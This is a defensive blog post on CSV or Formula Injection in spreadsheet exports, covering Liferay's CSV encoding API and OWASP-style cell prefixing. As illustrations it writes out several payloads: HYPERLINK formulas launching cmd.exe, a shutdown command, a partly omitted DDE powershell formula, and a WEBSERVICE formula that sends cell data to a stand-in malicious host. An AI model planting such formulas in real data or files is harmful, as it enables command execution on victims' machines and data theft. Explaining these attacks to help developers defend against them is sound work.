Tech Blog

Beware of formulas: Comma Separated Victims

Defense strategies against CSV Injection attacks

Simone Cinti
Software Architect
6 minutes read
liferay, security, formula, excel, csv, injection, attack, and vulnerability
This article is also available in Italiano 🇮🇹

Introduction

How many times have you had to deal with a CSV export plugin?

So many, I guess.

And are you aware about the risks of underestimating some vulnerabilities, that could expose your application to a Remote Command Execution or a Data Breach attack?

If you never heard of a CSV Injection or a Formula Injection attack before, so this article is for you.

In my previous article on SMC techblog, I've already shown you how the Injection attacks can represent a serious risk for your data security, and how to prevent them with Liferay.

So I suggest you to read this: Injection - how to prevent with Liferay in order to better understand the covered topics; anyway if you're aware of the pitfalls behind this kind of attacks and the defense strategies against, you won't find it difficult to continue reading.

In this article I'll explain what are CSV Injection or Formula Injection attacks, the possibile countermeasures to neutralize them and what the Liferay framework APIs can do to safely encode values while exporting in CSV format.

The input validation problem

As you know, the first rule to prevent the injection consists in input validation, refusing such input containing characters that can be useful for the attacker. Unfortunely, is not always so easy to find a regular expression which helps to filter all the undesired characters without excluding those we really need. An example can be the apostrophe character " ' " which is often needed for some countries in first-name or last-name fields, but we'll like to exclude because it is also an attribute token in HTML and also a valid character sequence token in SQL.

So it could be essential to have a robust input validation mechanism: this is the first rule of defense against injection attacks and is also the only way to prevent them.

It would be wise to do not forget the second rule of defense against the injection attacks: the neutralization by output sanitization or output escaping.

Despite all, it can also happen that we are completely unaware about the risks when missing a valid encoding mechanism for the output values in the exported cells, and all the kindness about the output sanitization can be forgotten when we're facing with the development of our custom CSV export plugin.

Nothing more dangerous...

In order to effectively show you the risks, now let's focus on the most difficult input field to validate: the notes field. Often, in a notes multiline field we'll allow space characters, currency symbols ando also the "%" symbol or other special characters.

But in the common case we're not going to validate nor escaping the values of exported cells, because often we're unaware of the pitfalls behind some undesired character sequences when loaded on a spreadsheet.

On the most widespread spreadsheets such as Microsoft Excel or LibreOffice Calc, some formulas could become a security issue.

For instance, if we try inject the following sequence in an input field:

=HYPERLINK("C:\Windows\System32\cmd.exe";"Click me")

the exported CSV will include such hyperlink in the corresponding cell so, when it's clicked by the user, the specified command or application will be executed (even after a confirmation).

The example above will launch the command prompt on the victim's machine; in this way the attacker exploits a Formula Injection in order to get a Remote Command Execution or, more appropriately, an OS Command Injection.

Scary, isn't it?

We can avoid it by input validation via a regular expression, but please note that the spreadsheet will also admit the URL-encoded format as follows:

=HYPERLINK("C%3A%5Cwindows%5Csystem32%5Ccmd.exe")

so here are the reasons why it could be tricky to protect against these kind of attacks when some charatecters like the percent, the equal or the parenthesis are needed and should be taken as a valid input in order to avoid a conflict with the user needs.

Luckily, the hyperlink formula in spreadsheets does not support additional command parameters; in such case we could get an immediate Windows shutdown injecting the following command:

C:\Windows\System32\cmd.exe /C "shutdown /p"

but the execution of other kind of scripts are allowed, such as a .vbs (VBScript) or a .bat (Batch) when the spreadsheet application is running on a Microsoft Windows O/S.

Whenever the victim uses a previous version of Microsoft Excel, or a newer one having the Dynamic Data Exchange service enabled, he/she could expose the entire system to a serious risk, for instance, when executing the following formula:

=cmd|'/K powershell ssh ...omitted...'!A0

Formula Injection attacks are the way to exploit and get other dangerous threats like O/S command execution to unexpectedly run a command, script or whatever executable on the victim's machine.

About the hyperlinks, an attacker can also get a malicious service invocation using the WEBSERVICE formula.

For instance, an attacker can inject a formula to invoke a remote web service, in order to get the content of other cells in the exported CSV. The attacker can perform a formula injection by typing it in a form input field, so the value will be permanently stored in the application database. Later, an user who asks for the data export will get a CSV containing that dangerous value in some cells. The user who receives and open the CSV file, completely unaware, it may also accidentally perform an HTTP request to the malicious service:

=WEBSERVICE(CONCAT("http://service.malware?d="; C6&","&C7&","&C8))

sending the content of one or more data cells via a GET parameter, becoming a victim of a Data Breach attack by a Formula Injection (as could be done by the parameter "d" in the example above, where values from cells C6, C7 and C8 are joined and sent together).

The Liferay API for CSV encoding

The CSVUtil class exposes two public static methods:

encode(Object object)
encode(String s)

the first method will merge the object in a string (in case of arrays), and then calls the latter.

The encode by string can be useful to avoid some issues with the double quotes, the delimiter token, or any other symbol who can interfere when importing or parsing the CSV file.

Altough useful, you have to pay attention: the encode() method will not help you to neutralize the Formula Injection attacks in any way.

Liferay, who takes care about your security, have just released a security patch CST-7058 for Liferay Portal 7.0 CE but it will only give you a way to disable the CSV export for Forms or Dynamic Data Lists components. As also described in a CST-7058 note:

This patch does not "solve" the CSV injection issue since the issue can only be fixed by the spreadsheet program (i.e., this is not a security vulnerability in Liferay Portal). With this patch, administrators will have the ability to disable CSV export for DDL and Form. Administrators can also present a warning about CSV injection to users before the CSV file is exported.

How to neutralize the Formula Injection attacks

Well, now you are probably wondering what are the defense strategies in order to neutralize these kind of attacks.

According to OWASP about the neutralization of CSV Injection or Formula Injection attacks, you have only to ensure that no cells begins with the following symbols:

  • = (equal)
  • + (plus)
  • - (minus)
  • @ (at)

in this way we can avoid the spreadsheet formulas to be injected as a value on the exported CSV cells.

Another solution would be prefixing the " ' " apostrophe character to each cell value starting with any of the symbols above.

This, of course, couldn't protect us from the users who are going to delete the prefix apostrophe character, getting the injected formula ready to be (unintentionally?) executed. In such case we can plan other sanitization strategies in order to protect the most proactive users by themselves.

We also suggest to apply the sanitization rule regardless of the presence of one or more double quotes at the beginning of the string. That's because the following value:

"=SUM(1+1)"

will be parsed as a valid formula by the spreadsheet (when loaded from a CSV file) and so it could be unintentionally executed by the user.

Conclusions

Formula Injection attacks can be so dangerous and they can act in several phases:

  • Phase 1: the attacker injects the malicious formula in one or more input form fields, and it will be also permanently stored in the application database.

  • Phase 2: a user will ask the application for a CSV export. The exported form data includes the poisoned field value containing the malicious formula previously injected.

  • Phase 3: the same user, or another user who recevies the exported CSV, will open the CSV with a spreadsheet application such as LibreOffice Calc or Microsoft Excel, and could unintentionally click over the injected malicious hyperlink or execute a formula. In such phase it will also take place the real attack because, as you can guess, a Formula Injection could be exploited to get a most dangerous attack like Remote Command Excecution or Data Breach, executing an Operating Systems command, a script or executable that can damage the host, or also open connections to remote endpoints chosen by the attacker in order to get sensitive or private data.

Unlike the XSS attacks, these attacks acts silently with a long delay with respect to the attack time, and they could be hard to detect.

Like the XSS attacks, however, we can use similar countermeasures:

  • preventing the attack by the validation of untrusted input values, discarding those who contains illegal character sequences

  • neutralizing the attack by sanitizing or by prefixing the input values with an apostrophe when possible, for each value starting with the following symbols regardless the presence of one or more starting double quotes:

    • = (equal)
    • + (plus)
    • - (minus)
    • @ (at)

So pay attention when developing custom CSV export plugins, applying all the tips described above, and stay tuned to the SMC Techblog's Liferay channel .

Further readings:

written by
Simone Cinti
Software Architect
Software Architect for SMC, he's involved in the design and development of Liferay Portal based solutions.

You might also like…